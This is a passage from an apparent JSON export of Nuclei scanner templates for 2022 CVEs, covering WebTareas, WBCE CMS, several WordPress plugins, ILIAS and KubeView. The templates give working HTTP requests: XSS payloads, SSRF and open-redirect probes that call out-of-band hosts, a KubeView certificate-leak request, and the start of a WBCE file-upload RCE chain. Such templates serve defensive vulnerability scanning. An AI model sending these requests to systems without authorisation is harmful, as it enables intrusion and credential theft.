------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n 10\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\n m/d/Y\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\n m/d/Y H:i\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n 2/./*\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n 0\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n 0\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA\n Content-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n 0\n ------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n - |\n @timeout: 5s\n GET /index.php?module=dashboard/ HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - status_code_4 == 200\n - contains(content_type_4, \"text/html\")\n - contains(body_4, \"\")\n - contains(body_4, \"rukovoditel\")\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"\n internal: true\n# digest: 490a0046304402202de06b8a6e888b2993c09a60cfd35c2c48341bc45d7140638b7da6a9f927e15c02205443f1e3d88ae7dca53733dc34930bd1491cd200d6b944d53412de96d56c8bd6:922c64590222798bb761d5b6d8e72950", "hash": "5a97746d747852c1ea8a88fcaa5505e4", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085c9" }, "name": "CVE-2022-44957.yaml", "content": "id: CVE-2022-44957\n\ninfo:\n name: WebTareas 2.4p5 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n reference:\n - http://webtareas.com/\n - https://github.com/anhdq201/webtareas/issues/11\n - https://nvd.nist.gov/vuln/detail/CVE-2022-44957\n - http://webtareas.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-44957\n cwe-id: CWE-79\n epss-score: 0.00091\n epss-percentile: 0.37842\n cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: webtareas_project\n product: webtareas\n tags: cve,cve2022,xss,webtareas,authenticated,intrusive,webtareas_project\n\nhttp:\n - raw:\n - |\n POST /general/login.php?session=false HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"action\"\n\n login\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginForm\"\n\n {{username}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"passwordForm\"\n\n {{password}}\n -----------------------------3023071625140724693672385525\n Content-Disposition: form-data; name=\"loginSubmit\"\n\n Log In\n -----------------------------3023071625140724693672385525--\n - |\n GET /clients/editclient.php? HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /clients/editclient.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"csrfToken\"\n\n {{csrf}}\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"action\"\n\n add\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"cown\"\n\n 1\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"cn\"\n\n {{randstr}}
    \n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"add\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"zip\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"ct\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"cou\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"wp\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"fa\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"url\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"email\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"curr\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"wc\"\n\n 1\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"pym\"\n\n 1\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"pyt\"\n\n 7\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"c\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"ssc\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"file1\"; filename=\"\"\n Content-Type: application/octet-stream\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"attnam1\"\n\n\n -----------------------------34025600472463336623659912061\n Content-Disposition: form-data; name=\"atttmp1\"\n\n\n -----------------------------34025600472463336623659912061--\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - '
    '\n - 'clients/listclients.php?'\n condition: and\n\n - type: word\n part: header_3\n words:\n - text/html\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'name=\"csrfToken\" value=\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 4a0a00473045022058e04c959164a6887128bff5e2c81ff9a549a4941e0adc621d267e956d6d1fe1022100d36b02df2b82b6dd9d1065d82767ab1ec79b2649450f25d69ecffca80b581608:922c64590222798bb761d5b6d8e72950", "hash": "78c252320a3f42f1cf190ed2f776f1be", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ca" }, "name": "CVE-2022-45037.yaml", "content": "id: CVE-2022-45037\n\ninfo:\n name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability.\n reference:\n - https://github.com/WBCE/WBCE_CMS\n - https://shimo.im/docs/dPkpKPQEjXfvYoqO/read\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45037\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-45037\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: wbce\n product: wbce_cms\n tags: cve,cve2022,xss,wbce,cms,authenticated\n\nhttp:\n - raw:\n - |\n GET /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n - |\n GET /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n - |\n GET /admin/users/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_5\n words:\n - \"\"\n - \"SESSION_TIMEOUT\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username_fieldname\n group: 1\n regex:\n - 'name=\"username_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: password_fieldname\n group: 1\n regex:\n - 'name=\"password_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: formtoken\n group: 1\n regex:\n - 'name=\"formtoken\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: username_fieldname_2\n group: 1\n regex:\n - 'name=\"username_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n# digest: 490a0046304402200bbd80622f1f04490521053deeca5606b0a210f7653053a685aaa4abce0fca8402204d4cd83e2003265d8894d8f57d458ccb79a94b581644b8968eb1b268fbb063b2:922c64590222798bb761d5b6d8e72950", "hash": "e291206e70c454a21d75492897677eb0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085cb" }, "name": "CVE-2022-45038.yaml", "content": "id: CVE-2022-45038\n\ninfo:\n name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/WBCE/WBCE_CMS\n - https://shimo.im/docs/Ee32MrJd80iEwyA2/read\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45038\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-45038\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: wbce\n product: wbce_cms\n tags: cve2022,cve,xss,wbce,cms,authenticated\n\nhttp:\n - raw:\n - |\n GET /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n - |\n GET /admin/settings/ HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/settings/save.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n advanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n - |\n GET /search/index.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Results For\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username_fieldname\n group: 1\n regex:\n - 'name=\"username_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: password_fieldname\n group: 1\n regex:\n - 'name=\"password_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: formtoken\n group: 1\n regex:\n - 'name=\"formtoken\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: app_name\n group: 1\n regex:\n - 'name=\"app_name\" value=\"(.*?)\"'\n internal: true\n part: body\n# digest: 490a004630440220236c2ea7a5a87ab71674dcbc6b934a4397029b3d326ba6f7e3a9a51beacb9a94022066f22477022e34bd8d4bd31f88af1c31eae3632e616489ed4c7763b4ea2aaa8d:922c64590222798bb761d5b6d8e72950", "hash": "e00a820379960480a32c82a56e1e2192", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085cc" }, "name": "CVE-2022-45354.yaml", "content": "id: CVE-2022-45354\n\ninfo:\n name: Download Monitor <= 4.7.60 - Sensitive Information Exposure\n author: DhiyaneshDK\n severity: high\n description: |\n The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access.\n remediation: |\n Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability.\n reference:\n - https://github.com/RandomRobbieBF/CVE-2022-45354\n - https://wordpress.org/plugins/download-monitor/\n - https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-7-60-sensitive-data-exposure-vulnerability?_s_id=cve\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-45354\n epss-score: 0.00408\n epss-percentile: 0.73349\n cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpchill\n product: download_monitor\n framework: wordpress\n shodan-query: html:\"/wp-content/plugins/download-monitor/\"\n tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/download-monitor/v1/user_data\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"registered\":'\n - '\"display_name\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206621ba65377b37becb2284647d51d4fe5423206a1ad56f63d7415c1fc1df85b602205154d8ffe0a0ab0837dcfabe75991d8434b2c1787f71eedbb5faad326966cc53:922c64590222798bb761d5b6d8e72950", "hash": "ad64e217d6bb0d2103228927619a2d20", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085cd" }, "name": "CVE-2022-45362.yaml", "content": "id: CVE-2022-45362\n\ninfo:\n name: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery\n author: theamanrawat\n severity: medium\n description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Update to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch.\n reference:\n - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability\n - https://wordpress.org/plugins/paytm-payments/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45362\n - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-45362\n cwe-id: CWE-918\n epss-score: 0.00177\n epss-percentile: 0.54919\n cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: paytm\n product: payment_gateway\n framework: wordpress\n tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm\n\nhttp:\n - raw:\n - |\n GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"paytm-payments.css\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a606fdab9141a48eca5d7f8c40acd7f3ba3028d4d72dc00349a20faed5122a37022100b040277863f3df37d504e8dd431bd931484d0f7c9344cc658e8926bf3b62cb23:922c64590222798bb761d5b6d8e72950", "hash": "ca710ee8a7b1e7f84dd86c87a7c247fe", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ce" }, "name": "CVE-2022-45365.yaml", "content": "id: CVE-2022-45365\n\ninfo:\n name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting\n author: theamanrawat\n severity: medium\n description: |\n The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n remediation: Fixed in version 3.23.3\n reference:\n - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test\n - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability\n - https://wordpress.org/plugins/stock-ticker/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45365\n - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-45365\n cwe-id: CWE-79\n epss-score: 0.00064\n epss-percentile: 0.26193\n cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: urosevic\n product: stock_ticker\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/stock-ticker/\"\n tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Stock Ticker Fatal\"\n - \"=6'\n - 'status_code_2 == 200'\n - 'contains(body_2, \"toplevel_page_paytm\")'\n condition: and\n# digest: 4a0a00473045022100fe699581fce1607f8724c7eac0c383fe061097ffc20bc0354bc2e269838e870102203fccdf0ab3f4266ac65a87df7587b0382e83527c032d713c3504102914c28652:922c64590222798bb761d5b6d8e72950", "hash": "93b72cd0600fb1d6623e99a253838817", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d0" }, "name": "CVE-2022-45835.yaml", "content": "id: CVE-2022-45835\n\ninfo:\n name: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: |\n WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server.\n remediation: Fixed in version 2.0.0.\n reference:\n - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf\n - https://wordpress.org/plugins/phonepe-payment-solutions/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45835\n - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf?_s_id=cve\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-45835\n cwe-id: CWE-918\n epss-score: 0.00359\n epss-percentile: 0.71627\n cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phonepe\n product: phonepe\n framework: wordpress\n tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe\n\nhttp:\n - raw:\n - |\n GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"cURL Test for PhonePe\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220647e8f5f43a41c1a5aa3e3e63c2cfc8fe1a095dec58d83435c28fa7bd8670a06022005456b8e4eaa85755e6312e7fb4b336d568fd2f5df3868e19a0bff431f1b0174:922c64590222798bb761d5b6d8e72950", "hash": "8a02b932c8824882c0998bc7b04fb25d", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d1" }, "name": "CVE-2022-45917.yaml", "content": "id: CVE-2022-45917\n\ninfo:\n name: ILIAS eLearning <7.16 - Open Redirect\n author: arafatansari\n severity: medium\n description: |\n ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability.\n reference:\n - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html\n - https://seclists.org/fulldisclosure/2022/Dec/7\n - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/\n - https://github.com/advisories/GHSA-hf6q-rx44-fh6j\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45917\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-45917\n cwe-id: CWE-601\n epss-score: 0.00221\n epss-percentile: 0.60222\n cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ilias\n product: ilias\n shodan-query: http.html:\"ILIAS\"\n tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me\"\n - \"{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me\"\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$'\n# digest: 4a0a00473045022074c907eb4d6662a485c5cf6a20275f49eb358e805470537fa2dbc2bce50294bf022100ba0bf38c3ae8f7f5c83e2be6e7139d53450397f272542f5ab8fb570c876547cc:922c64590222798bb761d5b6d8e72950", "hash": "bb80923e736156c9192cf97f17843957", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d2" }, "name": "CVE-2022-45933.yaml", "content": "id: CVE-2022-45933\n\ninfo:\n name: KubeView <=0.1.31 - Information Disclosure\n author: For3stCo1d\n severity: critical\n description: |\n KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933).\n reference:\n - https://github.com/benc-uk/kubeview/issues/95\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45933\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-45933\n cwe-id: CWE-306\n epss-score: 0.00908\n epss-percentile: 0.82406\n cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: kubeview_project\n product: kubeview\n shodan-query: http.title:\"KubeView\"\n tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/scrape/kube-system\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'BEGIN CERTIFICATE'\n - 'END CERTIFICATE'\n - 'kubernetes.io'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220200e122e6eeec45a80ae0d0335df320257e3e9c799280f827b9723b0103c57110221008ea2080e9b1a75447e165727409b6f4771777d8d18009062312e9b3cfc5838ae:922c64590222798bb761d5b6d8e72950", "hash": "68ed4de78be2a95c48031644b82bac9e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d3" }, "name": "CVE-2022-46020.yaml", "content": "id: CVE-2022-46020\n\ninfo:\n name: WBCE CMS v1.5.4 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability.\n reference:\n - https://github.com/WBCE/WBCE_CMS\n - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46020\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-46020\n cwe-id: CWE-434\n epss-score: 0.02743\n epss-percentile: 0.90317\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 6\n vendor: wbce\n product: wbce_cms\n tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n - |\n GET /admin/settings/index.php?advanced=yes HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/settings/save.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 